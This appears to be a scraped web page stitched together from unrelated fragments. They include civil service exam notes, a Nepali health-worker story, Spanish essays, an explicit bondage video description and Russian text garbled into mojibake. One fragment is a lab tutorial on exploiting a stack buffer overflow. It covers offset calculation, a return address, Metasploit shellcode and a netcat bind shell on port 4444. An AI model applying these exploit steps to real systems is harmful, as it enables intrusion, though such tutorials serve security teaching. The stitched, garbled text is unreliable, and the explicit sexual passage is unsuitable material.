NOTES 1:Graduation from a regionally accredited or New York State registered college or university with a Master’s Degree in Management Information Systems, Computer Science, Business or Public Administration may be substituted for two (2) years of the required generalized experience above but may not be substituted for the required specialized experience. 2. *Administrative experience is defined as the responsible planning, management and control functions of an organization or organizational unit including the development and/or approval of operating policy and procedures 3. **Supervision – Responsible direction and control of subordinate employees. This involves the assignment of work, approval of work, training, evaluation and discipline of employees. The supervisory aspects must be an integral part of the job, not incidental or occasional. 4. Verifiable part-time and/or volunteer experience will be pro-rated toward meeting full-time experience requirements. 5. Your degree and/or college credit must have been awarded by a regionally accredited college or university or one recognized by the New York State Education Department as following acceptable educational practices. A grade of "D" or better is necessary for a course to be credited as successfully completed. If your degree and/or college credit was awarded by an educational institution outside of the United States and its territories, you must provide independent verification of equivalency. You can write to this Department for a list of acceptable companies providing this service; you must pay the required evaluation fee. Notice to Candidates: Transcripts will now be accepted by the Department of Personnel ONLY at time of application. All subsequent transcripts must be submitted at time of interview.
The New York State Department of Civil Service has not prepared a test guide for this examination. However,candidates may find information in the publication "How to take a written test" helpful in preparing for this test. This publication is available on line at: www.cs.ny.gov/testing/localtestguides.cfm
Subjects of Examination:
Subjects of examination: A written test designed to evaluate knowledge, skills and /or abilities in the following areas: 1. Administration These questions test for knowledge of the managerial functions involved in directing an organization or an organizational segment. These questions cover such areas as: developing objectives and formulating policies; making decisions based on the context of the administrator's position and authority; forecasting and planning; organizing; developing personnel; coordinating and informing; guiding and leading; testing and evaluating; and budgeting. 2. Data center operations These questions test for knowledge of the principles and practices employed in planning, organizing and controlling the operating activities of a computer center. They cover such areas as: data center methods and procedures; identifying and resolving operational problems; coordinating and maintaining schedules for the utilization of equipment; and monitoring and controlling operating systems, equipment, and the physical environment in the computer center. 3. Principles of networked communications These questions test for basic concepts and terminology of data communications. They cover such subjects as data communications, types of networks, modems, security, protocols, topologies, transmission media, wiring, installation and troubleshooting. The questions are general in scope and are not specific to any vendor or system. 4. Preparing written material These questions test for the ability to present information clearly and accurately, and to organize paragraphs logically and comprehensibly. For some questions, you will be given information in two or three sentences followed by four restatements of the information. You must then choose the best version. For other questions, you will be given paragraphs with their sentences out of order. You must then choose, from four suggestions, the best order for the sentences. 5. Supervision These questions test for knowledge of the principles and practices employed in planning, organizing, and controlling the activities of a work unit toward predetermined objectives. The concepts covered, usually in a situational question format, include such topics as assigning and reviewing work; evaluating performance; maintaining work standards; motivating and developing subordinates; implementing procedural change; increasing efficiency; and dealing with problems of absenteeism, morale, and discipline. 6. Systems analysis and design These questions test for techniques and concepts of computer systems analysis and design. They cover such subjects as feasibility and applications studies, systems development tools and software, the systems life cycle, types of systems (e.g., client/server, Web-based), controls, and systems documentation, testing, and implementation. NOTICE TO CANDIDATES: Unless otherwise noted, candidates are permitted to use quiet, hand held, solar or battery powered calculators. Devices with typewriter keyboards, "Spell Checkers", “Personal Digital Assistants", "Address Books", "Language Translators", "Dictionaries", or any similar devices are prohibited. You may not bring books or other reference materials.
|Infiniteskills â Developing 3D Games with Unity|
Itâs never been easier to make 3D games using the Unity game engine, and in this video youâll learn how. Youâll go from an empty screen to the total build-out of a space combat simulator that lets you fly through space to shoot down the asteroids that threaten your spacecraft and a vulnerable space station. […]
|Heroes: Ashma and the Community Health Workers|
Since taking on the role of Associate Director of the Community Health Department just a few months ago, Ashma has taken the program by storm transforming the clinical follow-up program, helping get the WATSI program off the ground so that even our poorest patients can receive life-saving treatments from the tertiary care units in Nepalgunj and Kathmandu, and helping implement the mobile health technology platform that our community health workers now use to report their data. Through the numerous hours we have spent working with Ashma, she has become a close friend and a respected colleague.
Ashma has also quickly earned the trust of the community members. One Saturday when we accompanied her into a nearby village for the weekly community health meeting, one FCHV told us about a man in her ward who had HIV, TB, and asthma. The FCHV told us that the manâs health status had been deteriorating but he was not willing to go to the hospital because he had formally had a negative experience with clinicians during the course of one of his many visits to different medical centers. After the meeting, we went with Ashma and the FCHV to the manâs house, along the way passing families out in their fields preparing their rice patties in the heat of a Saturday afternoon. There, she spent well over an hour patiently discussing the situation with the family. The wife had literally carried her husband to all of his medical appointments throughout Nepal and India and just could not keep doing that while also raising their several young children. Ashma promised the family that she would personally see to it that the man got treated properly and only then would he agree to come. We then accompanied the man to the hospital where Ashma saw to it that he was received properly by the clinical team.
However, the story of the heroes of the community health program would not be complete without including the Community Health Worker Leaders and Female Community Health Volunteers. As we have had the chance to get to know the 9 CHWLs when they come to the hospital each week for trainings and to report data and the 92 FCHVs whenever we go out into the community, we have seen the dedication and kindness each woman brings to her position. While each woman has a different story for how she decided to become a CHW, every one of them brings a common desire to help their communities. The FCHVs are selected by their communities and are the true links between the population of Achham and all health services. These strong and wonderful women break down the barriers â geographic, cultural, and social â that the most vulnerable and marginalized Nepalis face in accessing care.
Ashma, the CHWLs, and the FCHVs are heroes.
|PNC ayuda a los mÃ¡s vulnerables||none|
|LA REPRESIÃN ES UN SÃNTOMA DE MOVIMIENTO|
En estos tiempos que corren, vuelan y no se dejan tomar... aparecen fantasmas (o ilusiones) que posibilitan la evidencia.
Si la policÃa nacional, el pasado viernes, actuÃ³ de forma represiva contra el CS 13Rosas, despuÃ©s de unas jornadas contra la represiÃ³n... lo que demuestra es que es evidente la evidencia. Evidente, en cuanto que la sede mÃ¡s vulnerable (por identificaciÃ³n), es el CS 13Rosas; evidente por haber ocurrido despuÃ©s de unas jornadas contra la represiÃ³n; y evidente, finalmente, por haber reprimido (con cÃ¡maras de TV, en concreto de La Sexta, incluidas).
AlcalÃ¡ de Henares es una ciudad difÃcil, tirante, que se resquebraja con facilidad. Tensiones acumuladas, orientaciones realmente sorprendentes y ediles extraÃ±os.
Es una ciudad donde el sustrato es bastante contradictorio pero entraÃ±able... Sin embargo, el devenir de los cuerpos de seguridad DEL estado; mÃ¡s que presentarse como voluntario en el ayudar cotidiano... como si de robÃ³tica se tratase decide aceptar el ordena y mando (fundamentalmente como en todos los lugares de la tierra donde existen estos aparatos).
AsÃ, pobres de ellos, las masas enfurecidas terminan por cargar el muerto directo. Ellos son (y se nos aparecen como) la primera referencia, el primer escollo, el primer obstÃ¡culo, los matones al que el gÃ¡ngster de turno envÃa para amordazar, reprimir, detener, infundir miedo... Ellos son la evidencia: La policÃa serÃ¡ la primera en sufrir la recogida de esas uvas de la ira que Steinbeck ya profetizÃ³ a finales de la dÃ©cada de los 30.
MaÃ±ana, martes 18 de febrero a las 17:00, hay concentraciÃ³n delante del Ayuntamiento de AlcalÃ¡ de Henares, coincidiendo con el Pleno Municipal. Podremos ir por la tarde, cuando la mayorÃa de la vecindad puede, ya que ese cambio fue uno de los primeros cambios relevantes de la nueva era que comenzÃ³... La del miedo que cambia de bando.
|Buffer Overflow Attack Example [Sending Shellcode] | Tutorial | Exploit Research | How To||Written by Pranshu Bajpai | Join me on Google+ | LinkedIn|
This is a demonstration of a Buffer Overflow attack to get remote shell of a Windows box.
Vulnerable Program - Server-Memcpy.exe [Resource: SecurityTube]
Vulnerable Function - memcpy
Tools - msfpayload, Immunity Debugger
Read up on Memory layout and Stack Frames before you begin [see 'Resources' at the bottom of this page]
Buffer Overflow Attack Example and Demonstration
Testing the Vulnerability to discover the possibility of a Buffer Overflow
Get the vulnerable server running on a Windows box and note the IP.
Create an exploit in python on your Linux machine sending input to the remote vulnerable server running on the Windows box.
Send an input of "A" * 1000 and notice the server crashing on the Windows box after receiving the first 1024 bytes.
Now load the server.exe in the Immunity Debugger and run the executable (F9).
Run the exploit on Linux box again to send an input of "A" * 1000 to crash the server on Windows box.
Notice the state of the registers and stack in the debugger after the server crashes. Notice EBP and EIP overflow and now both contain '41414141' which is hex for "AAAA".
Now we can see that we can overflow the buffer and manipulate the address stored in EIP and EBP.
Caculating the Offset using pattern_create and pattern_offset
To calculate the Offset we need 'pattern_create.rb' and 'pattern_offset.rb' included with the Metasploit Framework Toolkit
Create a Large Pattern (of 1000 bytes) using pattern_create
Copy and Pattern and send this pattern as Input to the Vulnerable server using the Python Exploit
Check the Value of EIP in the debugger [In this case it is 6A413969]
Search for this value in the pattern by using pattern_offset.rb
Note down the offset value = 268 [So now we understand that these first 268 bytes don't matter to us, they are just used to fill the buffer]
We are interested in the remaining bytes which will include the return address and the payload (shellcode) and optionally NOP sled.
Finding the Return AddressNow we need to find out the return address to be fed to EIP which will point to the Malicious payload (Shellcode) in the stack
We notice that the return address can be 0022FB70
In Little Endian format the return address is \x70\xFB\x22\x00
Creating Payload [ Generating Shellcode for Windows box ]
Now we require the payload (shellcode). It can be generated using msfpayload
About Bad Bytes in the Shellcode or Return Address(If you're a beginner, this might confuse you. If that's the case, skip this part as it doesn't apply for this particular example.)
Remember to remove any bad bytes if you notice them in the shellcode or return address (bytes like null, carriage return).
We notice that our return address has a byte "\x00" in the end which is a bad byte.
However, in this particular case, since the function is memcpy, the string terminator byte of "\x00" doesn't matter.
But in a function like strcpy this bad byte would terminate the string and we would have to use address of a JUMP ESP as return address.
Constructing Final Exploit Code
In the Python exploit, Send Input = 268 Random bytes (A) + Return Address (\x70\xFB\x22\x00) + Shellcode
Final Exploit Code would send the following input to the Vulnerable Server
_to_send = "A" * 268
Exploit Successful, We got a Shell!! 0wn3d!
Send the exploit to vulnerable server (IP: 172.19.19.192, in this case)
This would spawn a shell on the Windows box which would be listening on port 4444
Use netcat to connect to the machine on port 4444
At server side on Windows box, the server is still running and shows that it has received 613 bytes
Do the Math
Random bytes of "A" = 268 bytes
Return Address = 4 bytes
Payload = 341 bytes
Total = 613 bytes
Smashing The Stack for Fun and Profit - AlephOne [It's very important to read this]
Exploit Research @ SecurityTube
|Gimme Shelter||Seems that finally – after this long, warm autumn – the cold weather is about to arrive. With this in mind I have been busy bringing vulnerable plants undercover. The brugmansia was still flowering prolifically, but I took a deep breath and cut it back to about 50cm and have now given it a fleece […]|
|Un imÃ¡n busca evitar la radicalizaciÃ³n en la prisiÃ³n||Cinco por ciento de la poblaciÃ³n en Suiza profesa la religiÃ³n musulmana y uno de tres prisioneros sigue los preceptos de AlÃ¡. Pero solo pocas cÃ¡rceles permiten la visita de un amÃ¡n. Una de ellas, la prisiÃ³n de Berna. Mustafa MemetiÂ la visita una vez a la semana. ActÃºa como intermediario entre las autoridades de la instituciÃ³n y los reos musulmanes. Ofrece apoyo espiritual. Aborda temas de religiÃ³n, vida familiar y otros asuntos personales con los fieles. El imÃ¡n busca tambiÃ©n frenar la radicalizaciÃ³n de la que pudieran ser objeto los reos. Las ideologÃas extremistas pueden florecer tras las rejas, atrayendo a personas vulnerables. La directora de la prisiÃ³n bernesa, Monika Kummer, describe lo que ella considera seÃ±ales de alarma entre los presos: âSi alguien se deja crecer la barba, deja de oÃr mÃºsica y mirar la televisiÃ³n, empezamos a observarlo mÃ¡s de cercaâ. Memeti, por su parte, indica que en caso de signos de radicalizaciÃ³n, intenta hablar con los afectados al respecto:|
|Bound And Beautiful||
Doll-like Catalina writhes happily in string and red lingerie atop a shiny black piano while Paul plays (!) beautiful music for her. Blonde sprite Angella Faith wears innocent pink lingerie as she struggles under a steel frame. She«s completely vulnerable to Paul»s roaming hands, especially after he ballgags her (on camera). Angella«s happy just to roll around alone when she»s mummified from neck to ankles in red and white duct tape. Stunning Eve Ellis rounds out the program. Dressed in black lingerie and six-inch heels, she«s breathtaking in a sexy nylon strap frogtie with a white ballgag, but it»s her final scene will make your sap boil! She's nude except for her heels, and bound cleanly to a bondage nag. Her hair is tied back, pulling her head up high. Paul strokes and squeezes her body and uses a stinging riding crop on her perfect ass. Eve was very happy during this shoot, and her excitement is quite visible!
Video: 618x466, AVC (H.264), 911kbps
File size: 596.8 MB
|Al ver a las gentes, se compadecÃa de ellas (Mateo 9,35-10,1.6-8)|
âLo que han recibido gratis, denlo gratisâ
En la vida uno podrÃa plantearse: Â¿QuÃ© estÃ¡ abandonado, sin sentido, sin orientaciÃ³n, sin un camino, sin la capacidad de llorar, sin saber pedir, sin voluntad de dar?
Cada dÃa caminamos kilÃ³metros, transportamos nuestros kilos y lo que menos hacemos es darle las gracias a nuestros pies. Cada dÃa hacemos uso de nuestros sentidos y no nos fijamos en lo que produce una lÃ¡grima, en lo que permite el movimiento de nuestro cuerpo, en la sangre, etc.
AsÃ como no nos fijamos en lo fÃsico tampoco nos detenemos a ver la interioridad, espiritualidad, el elemento psicolÃ³gico. CÃ³mo es que todos amamos pero algunos de manera inadecuada y con traumas. CÃ³mo explicar la ira, la impaciencia, el egoÃsmo. CÃ³mo podemos ser injustos y comer tranquilos, engaÃ±ar a la persona que amamos y compartir la vida, decir que somos fieles y estamos coqueteando e ilusionando a otras personas. CÃ³mo explicar que el dinero te haga replantear el amor ya sea que falte o sea abundante. CÃ³mo teniÃ©ndolo todo para ser felices terminamos siendo desesperados, complicados, irrespetuosos, soberbios, mentirosos, criticones, habladores, pretenciosos, presumidos y, por tanto, infelices.
Gracias a Dios, no somos sÃ³lo eso, tambiÃ©n nos llegarÃ¡ el reumatismo, la diabetes, el cÃ¡ncer, la osteoporosis, taquicardia. No sabemos lo que comemos, somos frutos de nuestras pasiones. No es un pesimismo existencial, sÃ³lo quiero expresar que somos vulnerables y cada dÃa es un milagro no sÃ³lo fruto de lo muy inteligentes o absolutos que seamos.
En esta situaciÃ³n, todo el paquete insuficiente descrito acaso no serÃa bueno que JesÃºs se compadezca. Aunque su compasiÃ³n es porque las personas estÃ¡n descuidadas, como ovejas sin pastor, sin guÃa, sin protecciÃ³n, sin palabras de afecto, sin que alguien se preocupe por lo que come o por los sÃntomas de su vida. Tanta soledad y tanto desamor suele hundir los Ã¡nimos y peor si el desamor estÃ¡n enfangado hiere a los corazones mÃ¡s puros.
Siendo asÃ, tenemos que aceptar que no sÃ³lo necesitamos de la compasiÃ³n de Dios, sino tambiÃ©n de las otras personas. No sÃ³lo de un pastor, sino que nosotros podemos tomar dicha misiÃ³n a favor de tntas personas enfermas, solas, frustradas, desesperadas. AsÃ pues, la compasiÃ³n de Dios hace que â Vayan y proclamen que el Reino de Dios ya estÃ¡, curen enfermos, resuciten muertos, limpien leprosos, expulsen demoniosâ.
|ÐÐµÐ¼Ð¸Ð´Ð¾Ð²ÑÐºÐ¸Ð¹ ÐºÑÐµÑÑ Ð½Ð° ÑÐµÐºÐµ Ð§ÑÑÐ¾Ð²Ð°Ñ||Ð£Ð¶ Ð¿ÑÐ¾ÑÑÐ¸ÑÐµ Ð·Ð° Â«Ð¨Ð¾, Ð¾Ð¿ÑÑÑ, ÑÐ½ÐµÐ³Ð¾Ñ
Ð¾Ð´Ñ?!Â», Ð½Ð¾ Ð¿Ð¾ÐºÐ° Ð·Ð¸Ð¼Ð°â¦|
ÐÐ¾ÑÐ¾Ð· ÑÑÑÐ¾Ð¼ Ð¿Ð¾Ð´ 30 Ð¸ Ð¿Ð¾ÑÑÐ¸ Ð½ÐµÐ·Ð°Ð¼ÐµÑÐ½ÑÐ¹ Ð½Ð° Ð´Ð½ÐµÐ²Ð½Ð¾Ð¼ ÑÐ¾Ð»Ð½ÑÐµ.
Ð¡Ð½ÐµÐ³, Ð°Ð±ÑÐ¾Ð»ÑÑÐ½Ð¾ Ð½Ð¸ÐºÐµÐ¼ Ð½Ðµ Ð²Ð·Ð¾ÑÐ²Ð°Ð½Ð½ÑÐ¹ Ð¸ Ð¿Ð¾Ð·Ð²Ð¾Ð»ÑÑÑÐ¸Ð¹ ÑÐµÐ·Ð²Ð¸ÑÑÑÑ Ð¸ Ð¾ÑÑÐ°Ð±Ð°ÑÑÐ²Ð°ÑÑ ÑÐ°Ð·Ð»Ð¸ÑÐ½ÑÐµ Ð¿Ð¾ÑÑÐ¸ Ð°ÐºÑÐ¾Ð±Ð°ÑÐ¸ÑÐµÑÐºÐ¸Ðµ ÑÑÑÐºÐ¸ Ð½Ð° ÑÐ½ÐµÐ³Ð¾Ñ Ð¾Ð´Ðµ Ð±ÐµÐ· ÐºÐ°ÐºÐ¸Ñ -Ð»Ð¸Ð±Ð¾ Ð¿Ð¾ÑÐ»ÐµÐ´ÑÑÐ²Ð¸Ð¹.
ÐÐ¾Ð»ÑÐ½Ñ, ÑÐºÐ»Ð¾Ð½Ñ Ð¸ ÑÑÑÑÐ¸, ÑÑÐ¾ÑÐ¸ÑÐ° Ð¸ÑÑÐµÐ·Ð½ÑÐ²ÑÐ¸Ñ Ð´ÐµÑÐµÐ²ÐµÐ½Ñ Ð½Ð° Ð±ÐµÑÐµÐ³Ñ Ð§ÑÑÐ¾Ð²Ð¾Ð¹ Ð¸ Ð²Ð¾Ð¾Ð±ÑÐµ Ð½ÐµÐ¿ÐµÑÐµÐ´Ð°Ð²Ð°ÐµÐ¼ÑÐµ Ð²Ð¸Ð´Ñ ÑÑÐ¾Ð¹ Ð¸Ð·Ð²ÐµÑÑÐ½Ð¾Ð¹ ÑÐµÐºÐ¸ Ð¸ ÐµÐµ Ð¾ÐºÑÐµÑÑÐ½Ð¾ÑÑÐµÐ¹. Ð ÑÐ°Ð¼Ð¾Ðµ Ð³Ð»Ð°Ð²Ð½Ð¾Ðµ â Ñ Ð¾ÑÐ¾ÑÐ°Ñ ÐºÐ¾Ð¼Ð¿Ð°Ð½Ð¸Ñ ÑÐ½ÐµÐ³Ð¾Ñ Ð¾Ð´ÑÐ¸ÐºÐ¾Ð² Ð¸ Ð´Ð°Ð¶Ðµ ÑÐ½ÐµÐ³Ð¾Ñ Ð¾Ð´ÑÐ¸Ñ.
Ð Ð²Ð¾Ñ Ð¾Ð¿ÑÑÑ Ð² ÑÑÐ±Ð±Ð¾ÑÑ Ð¿Ð¾Ð´ÑÐµÐ¼ Ð² 5 ÑÑÑÐ°: ÑÐ±Ð¾ÑÑ, Ð¿Ð¾Ð³ÑÑÐ·ÐºÐ° ÑÐ½ÐµÐ¶ÐºÐ¾Ð², ÑÑÑÐµÐ½Ð½Ð¸Ð¹ ÐºÐ¾ÑÐµ â ÐµÐ´ÐµÐ¼ Ð¸Ð· Ð¢Ð°Ð³Ð¸Ð»Ð° Ð² Ð¡ÑÐ»ÐµÐ¼ â Ð±Ð»Ð°Ð³Ð¾ ÑÐ½ÐµÐ³ Ð·Ð° Ð½Ð¾ÑÑ Ñ Ð¾ÑÐ¾ÑÐ¾ Ð¿Ð¾Ð´Ð²Ð°Ð»Ð¸Ð». Ð¡ÐµÐ³Ð¾Ð´Ð½Ñ ÐµÐ´ÐµÐ¼ Ðº ÐÐµÐ¼Ð¸Ð´Ð¾Ð²ÑÐºÐ¾Ð¼Ñ ÐºÑÐµÑÑÑ Ñ ÐÐ¸ÑÐ°Ð½Ð¾Ð³Ð¾ ÐºÐ°Ð¼Ð½Ñ.
Ð Ð¡ÑÐ»ÐµÐ¼Ðµ Ð½Ð° ÑÐ°ÑÑÐ²ÐµÑÐµ Ð½ÐµÐ±Ð¾ Ð¿Ð¾ÑÑÐ¸ Ð¿ÑÐ¾ÑÑÐ½Ð¸Ð»Ð¾ÑÑ Ð¿ÑÑÐ¼Ð¾ Ð½Ð° Ð³Ð»Ð°Ð·Ð°Ñ â Ð²ÑÐµ-ÑÐ°ÐºÐ¸ Ð¾Ð¿Ð»Ð°ÑÐ° Ð·Ð° Ð¿Ð¾Ð³Ð¾Ð´Ñ Ð¿ÑÐ¾ÑÐ»Ð°.
Ð¡ÐµÑÐµÐ³Ð° ÐÐ¸ÑÐ°Ð³Ð° ÑÑÐ°Ð´Ð¸ÑÐ¸Ð¾Ð½Ð½Ð¾ Ñ ÑÐ¾ÑÐ¾ÑÑÐ¶ÑÐµÐ¼ Ð¸ Ð½Ðµ Ð² ÐºÐ°Ð´ÑÐµ. ÐÐ¿ÐµÑÐ²ÑÐµ Ð·Ð° Ð¼Ð½Ð¾Ð³Ð¸Ðµ Ð³Ð¾Ð´Ñ ÑÐ¾ Ð¼Ð½Ð¾Ð¹ Ð¿Ð°ÑÑÐ°Ð¶Ð¸ÑÐ¾Ð¼ Ð¿Ð¾ÐµÑ Ð°Ð»Ð° Ð¶ÐµÐ½Ð° â Ð±ÑÐ´ÐµÑ Ð¿ÑÐ¸ÑÐ²Ð¾ÑÑÑÑÑÑ ÑÑÐ¼ÐºÐ¾Ð¹ Ð¸ Ð¿ÑÐ¾ÑÐ¸ÑÑ Ð¿Ð¾ÑÐ°Ð´Ñ Ð½Ð° ÐºÑÑÑÑÑ Ð²Ð¸ÑÐ°Ð¶Ð°Ñ , Ð·Ð°ÑÐ¾ Ð¼Ð½Ðµ Ð±Ð¾Ð»ÑÑÐµ Ð½Ðµ Ð¿ÑÐ¸Ð´ÐµÑÑÑ Ð´Ð¾Ð¼Ð° Ð¾Ð±ÑÑÑÐ½ÑÑÑ, Ð³Ð´Ðµ Ð¸ ÑÑÐ¾ Ñ Ð´ÐµÐ»Ð°Ñ Ð¿Ð¾ Ð²ÑÑ Ð¾Ð´Ð½ÑÐ¼ â Ð¾Ð½Ð° Ð²ÑÐµ ÑÐ²Ð¸Ð´Ð¸Ñ ÑÐ²Ð¾Ð¸Ð¼Ð¸ Ð³Ð»Ð°Ð·Ð°Ð¼Ð¸ Ð¸ ÑÑÐºÐ°Ð¼Ð¸. ÐÐ°Ðº-ÑÐ¾ Ð¿Ð¾ÐµÑ Ð°Ð»Ð¸ Ð¼Ñ Ñ Ð½ÐµÐ¹ ÑÐ¸Ð¿Ð° Ð² ÐºÐ°ÑÐµ Ð²ÐµÑÐµÑÐ¾Ð¼ Ð½Ð° Ð¼Ð¾ÑÐ¾ÑÐ¸ÐºÐ»Ðµ (Ð¡Ð¡Ð«ÐÐÐ) â Ð¾Ð½Ð° Ð¿Ð¾ÑÐ¾Ð¼ ÑÑÐ°Ð·Ñ Ð¿ÑÐµÐ´Ð»Ð¾Ð¶Ð¸Ð»Ð° Ð¿ÑÐ¾Ð´Ð°ÑÑ ÐµÐµ ÑÐºÐ¸Ð¿Ð¸ÑÐ¾Ð²ÐºÑ.
ÐÐ¾ÑÐ»Ðµ Ð½ÐµÐ¿ÑÐ¾Ð´Ð¾Ð»Ð¶Ð¸ÑÐµÐ»ÑÐ½ÑÑ ÑÐ±Ð¾ÑÐ¾Ð² Ð¿Ð¾Ð»ÐµÑÐµÐ»Ð¸.
Ð¡ÑÐ°Ð·Ñ Ð½Ð° Ð¿ÐµÑÐ²Ð¾Ð¹ Ð¶Ðµ Ð¿Ð¾Ð»ÑÐ½ÐºÐµ ÑÑÑÑÐ¾Ð¸Ð»Ð¸ Ð½ÐµÐ±Ð¾Ð»ÑÑÑÑ ÑÐ°Ð·Ð¼Ð¸Ð½ÐºÑ. ÐÐ»ÐµÐ½Ð° Ð¼Ð¾Ð»ÑÐ° ÑÐµÑÐ¿ÐµÐ»Ð° Ð²ÑÐµ ÑÑÐ³Ð¾ÑÑ Ð¸ Ð»Ð¸ÑÐµÐ½Ð¸Ñ Ð½Ð° Ð¿Ð°ÑÑÐ°Ð¶Ð¸ÑÑÐºÐ¾Ð¼ Ð¼ÐµÑÑÐµ Ð¸ Ð¼Ð¾Ð»Ð¸Ð»Ð°ÑÑ, Ð° ÐµÑÐ»Ð¸ Ð½Ðµ Ð¼Ð¾Ð»Ð¸Ð»Ð°ÑÑ, ÑÐ¾ ÐµÐ¹ ÑÐ¾ÑÐ½Ð¾ ÑÐ»ÐµÐ´Ð¾Ð²Ð°Ð»Ð¾ Ð±Ñ ÑÑÐ¸Ð¼ Ð·Ð°Ð½ÑÑÑÑÑ.
ÐÐ° ÑÐ¾ÑÐ¾ ÐµÐµ Ð½Ðµ Ð²Ð¸Ð´Ð½Ð¾, Ð½Ð¾ Ð¾Ð½Ð° ÐµÑÑÑ
ÐÐ°ÑÐµÐ¼ Ð½ÐµÐ¼Ð½Ð¾Ð³Ð¾ Ð»ÐµÑÐ° Ð¸ ÐµÑÐµ Ð½ÐµÐ¼Ð½Ð¾Ð³Ð¾ Ð¿Ð¾Ð»ÑÐ½Ð¾Ðº. Ð Ð²Ð¾Ñ Ð Ð¾Ð¼Ð°Ð½Ð¾Ð²Ð¾ â Ð¾ÑÐµÑÐµÐ´Ð½Ð°Ñ Ð¸ÑÑÐµÐ·Ð½ÑÐ²ÑÐ°Ñ Ð´ÐµÑÐµÐ²Ð½Ñ Ð½Ð° Ð§ÑÑÐ¾Ð²Ð¾Ð¹ â Ð½Ð¸ÐºÐ°ÐºÐ¸Ñ ÑÐ»ÐµÐ´Ð¾Ð² Ð¿ÑÐ¸ÑÑÑÑÑÐ²Ð¸Ñ ÑÐµÐ»Ð¾Ð²ÐµÐºÐ° â ÑÐ¾Ð»ÑÐºÐ¾ ÑÐ½ÐµÐ³, Ð½ÐµÑÑÐ¾Ð½ÑÑÑÐ¹ Ð½Ð¸ÐºÐµÐ¼.
ÐÐ¾Ð³Ð½Ð°Ð»Ð¸!!! ÐÐ»ÐµÐ½Ð°, Ð´ÐµÑÐ¶Ð¸ÑÑ!
ÐÐ° Ð²Ð¾Ð·Ð²ÑÑÐµÐ½Ð½Ð¾ÑÑÐ¸ Ð½Ð°Ð´ ÑÐµÐºÐ¾Ð¹ ÑÑÐ°Ð´Ð¸ÑÐ¸Ð¾Ð½Ð½Ð¾Ðµ ÑÐ¾ÑÐ¾
ÐÑÐµÑ Ð½Ð° ÑÐ°ÐºÐ¸Ñ Ð¿ÑÐ¾ÑÑÐ¾ÑÐ°Ñ Ð±ÑÐ»Ð¾ Ð½Ðµ Ð¿Ð¾Ð²Ð°Ð»ÑÑÑÑÑ â Ð²ÑÐµ Ð¿Ð¾Ð³Ð½Ð°Ð»Ð¸ Ð³Ð¾Ð½ÑÑÑ Ð½Ð° ÑÐ°Ð·Ð½ÑÑ ÑÐ½ÐµÐ¶ÐºÐ°Ñ
ÐÐ¾Ð±ÑÐ½Ð´Ð¾ÑÐ¸Ð»ÑÑ :) Ð£ÑÐ¾Ð½Ð¸Ð» â ÐºÑÐ¿Ð¸Ð»
Ð¡ÑÐ°Ð²Ð¸Ð»Ð¸ Ð²ÑÐµ Ð¸ Ð²ÑÑ Ð½Ð° Ð¿ÑÑÐºÑ â ÑÐ¸Ð¿Ð° Ð²Ð¸Ð»Ð»Ð¸.
ÐÐ´ÐµÑÑ ÐµÑÑÑ, Ð³Ð´Ðµ ÑÐ°Ð·Ð²ÐµÑÐ½ÑÑÑÑÑ
ÐÐ°Ð»ÑÑÐµ Ð´Ð¾ÑÐ¾Ð³Ð° ÑÐ»Ð° Ð²Ð´Ð¾Ð»Ñ ÑÐµÐºÐ¸, Ð²ÑÐµÐ¼ÐµÐ½Ð°Ð¼Ð¸ Ð¿ÐµÑÐµÐ¿ÑÑÐ³Ð¸Ð²Ð°Ñ ÑÐµÑÐµÐ· ÑÐµÐºÑ. ÐÐ¾ ÑÐµÐºÐµ Ð¸Ð´ÑÐ¸ Ð½Ðµ Ð±ÑÐ»Ð¾ Ð½Ð¸ÐºÐ°ÐºÐ¾Ð³Ð¾ Ð¶ÐµÐ»Ð°Ð½Ð¸Ñ, Ñ Ð¾ÑÑ ÑÐ»ÐµÐ´Ð¾Ð² ÑÑÐ±Ð°ÑÐºÐ¸Ñ ÑÐ½ÐµÐ³Ð¾Ñ Ð¾Ð´Ð¾Ð² ÑÐ°Ð¼ Ð´Ð¾Ð²Ð¾Ð»ÑÐ½Ð¾ Ð¼Ð½Ð¾Ð³Ð¾.
ÐÐ° Ð·Ð°Ð´Ð½ÐµÐ¼ ÑÐ¾Ð½Ðµ Ð§ÑÑÐ¾Ð²Ð°Ñ.
ÐÐ¾ÑÐ¾Ð¶ÐºÐ¸ Ð² Ð»ÐµÑÑ Ð¾ÑÐµÐ½Ñ ÐºÑÐ°ÑÐ¸Ð²ÑÐµ Ð¸ Ð¿Ð¾ÑÑÐ¸ Ð½ÐµÑ Ð¾Ð¶ÐµÐ½Ð½ÑÐµ â ÑÐ¾Ð»ÑÐºÐ¾ ÑÑÐ°ÑÑÐµ Ð±ÑÑÐ°Ð½Ð¾Ð²ÑÐºÐ¸Ðµ ÑÐ»ÐµÐ´Ñ.
Ð Ð²Ð¾Ñ Ð¿ÐµÑÐµÐ´ Ð£ÑÑÑ-Ð£ÑÐºÐ¾Ð¹ Ð¾Ð¿ÑÑÑ Ð¿Ð¾Ð»ÑÐ½ÐºÐ¸.
ÐÐ¾Ð²Ð° Ð¸ ÐµÐ»ÐºÐ¸
ÐÐ¸ÐºÐ¸Ð½Ð³ ÑÐ¾Ð¶Ðµ Ð¼Ð¾Ð¶ÐµÑ. ÐÐ»ÐµÐ½Ð° Ð²ÑÐµ Ð½Ð¸ÐºÐ°Ðº ÑÐ¿Ð¾ÑÐ½Ð¾ Ð½Ðµ Ð¾ÑÑÐµÐ¿Ð»ÑÐ»Ð°ÑÑ Ð¸ Ð»Ð¾Ð²Ð¸Ð»Ð° Ð²ÑÐµ Ð¿ÑÐµÐ»ÐµÑÑÐ¸ Ð²ÐµÑÐµÐ»Ð¾Ð³Ð¾ ÐºÐ°ÑÐ°Ð½Ð¸Ñ
